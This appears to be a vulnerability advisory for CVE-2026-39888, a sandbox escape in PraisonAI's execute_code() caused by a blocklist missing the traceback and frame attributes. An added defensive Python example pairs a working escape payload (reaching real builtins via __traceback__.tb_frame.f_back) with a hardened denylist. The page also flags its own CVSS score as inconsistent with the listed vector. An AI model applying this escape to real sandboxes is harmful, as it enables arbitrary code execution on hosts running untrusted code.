Code Execution Vulnerability in PraisonAI by Mervin Praison
CVE-2026-39888

Score: 10 (CRITICAL)

Key Information:

Vendor: Mervin Praison
CVE Published: 8 April 2026

What is CVE-2026-39888?

PraisonAI is a multi-agent framework. In praisonaiagents versions before 1.5.115, user-supplied code run through execute_code() in praisonaiagents.tools.python_tools can escape the sandbox it is supposed to be confined to. execute_code() defaults to sandbox_mode="sandbox", which is meant to run user code in a controlled environment, but the built-in blocklist of restricted attribute names omits the attributes used to walk from an exception up the call stack: traceback, tb_frame, f_back, and f_builtins. Code that passes the blocklist can therefore reach the frame that invoked it, read that frame's real Python builtins dictionary, and from there import modules and execute arbitrary code, defeating the sandbox entirely. The issue is fixed in version 1.5.115.
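The mechanism above, as an added example that is not code from PraisonAI: a constructed toy sandbox that enforces an attribute-name denylist on the AST and then calls exec() with a trimmed builtins dict, a payload that uses only the frame attributes the advisory names (`__traceback__` is the real attribute name on exception objects), and a hardened denylist that adds them. The blocklist contents, SAFE_BUILTINS, and the helper names are assumptions for illustration.

```python
import ast
import builtins

# Constructed toy sandbox modeled on the advisory's description. The attribute
# names in both lists are assumptions, not the project's actual blocklist.
NAIVE_BLOCKLIST = frozenset({
    "__globals__", "__subclasses__", "__bases__", "__mro__", "__class__",
    "__dict__", "__import__", "__builtins__", "__code__", "__closure__",
})

# Frame/traceback attributes the advisory says the original list omitted.
FRAME_ATTRS = frozenset({
    "__traceback__", "tb_frame", "tb_next", "f_back", "f_builtins",
    "f_globals", "f_locals", "gi_frame", "cr_frame", "ag_frame",
})
HARDENED_BLOCKLIST = NAIVE_BLOCKLIST | FRAME_ATTRS

# Only a handful of builtins are exposed to user code. Deliberately no
# getattr/vars: those let a string stand in for an attribute name and would
# make any name-based denylist trivially bypassable.
SAFE_BUILTINS = {"len": len, "str": str, "range": range, "sum": sum,
                 "Exception": Exception}


def blocked_attributes(code: str, blocklist: frozenset) -> list:
    """Return the denylisted attribute names referenced anywhere in `code`."""
    return sorted({n.attr for n in ast.walk(ast.parse(code))
                   if isinstance(n, ast.Attribute) and n.attr in blocklist})


def run_sandboxed(code: str, blocklist: frozenset):
    """Reject code that names a blocked attribute, else exec it with trimmed builtins."""
    hits = blocked_attributes(code, blocklist)
    if hits:
        raise PermissionError(f"blocked attribute(s): {hits}")
    env = {"__builtins__": dict(SAFE_BUILTINS)}
    # This frame is the exec'd code's f_back, and it has the real builtins.
    exec(compile(code, "<sandbox>", "exec"), env)
    return env.get("result")


# Constructed payload: references no name on NAIVE_BLOCKLIST, yet walks from a
# traceback to the frame that called exec() and reads that frame's builtins.
ESCAPE = """
try:
    1 / 0
except Exception as e:
    caller = e.__traceback__.tb_frame.f_back
    result = caller.f_builtins
"""

BENIGN = "result = sum(range(10))"


def naive_sandbox_escapes() -> bool:
    """True if the payload hands back the interpreter's real builtins dict."""
    return run_sandboxed(ESCAPE, NAIVE_BLOCKLIST) is builtins.__dict__


def hardened_sandbox_blocks() -> bool:
    """True if the extended denylist rejects the same payload before exec()."""
    try:
        run_sandboxed(ESCAPE, HARDENED_BLOCKLIST)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print("benign result:", run_sandboxed(BENIGN, HARDENED_BLOCKLIST))
    print("naive sandbox escapes:", naive_sandbox_escapes())
    print("hardened sandbox blocks payload:", hardened_sandbox_blocks())
```

Once the payload holds the real builtins dict, `["__import__"]("os")` or `["open"]` is one subscript away, and subscripts are not attribute accesses, so the denylist never sees them. Extending the list closes the specific hole described in the advisory, but a name-based denylist remains a weak boundary: any route to getattr, vars, or the type hierarchy reopens it, which is why process-level isolation (a separate process or container with restricted privileges) is the safer default for untrusted code.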

Affected Version(s)

praisonaiagents < 1.5.115

CVSS V3.1

Score: 10
Severity: CRITICAL
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

Note: the metrics as listed (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) compute to a CVSS 3.1 base score of 9.9, not 10; a base score of 10.0 with these impact and scope values requires Privileges Required: None. One of the two entries on this page is inconsistent with the other, so check the vector against the primary advisory before relying on it.

Timeline

  • Vulnerability published: 8 April 2026

  • Vulnerability reserved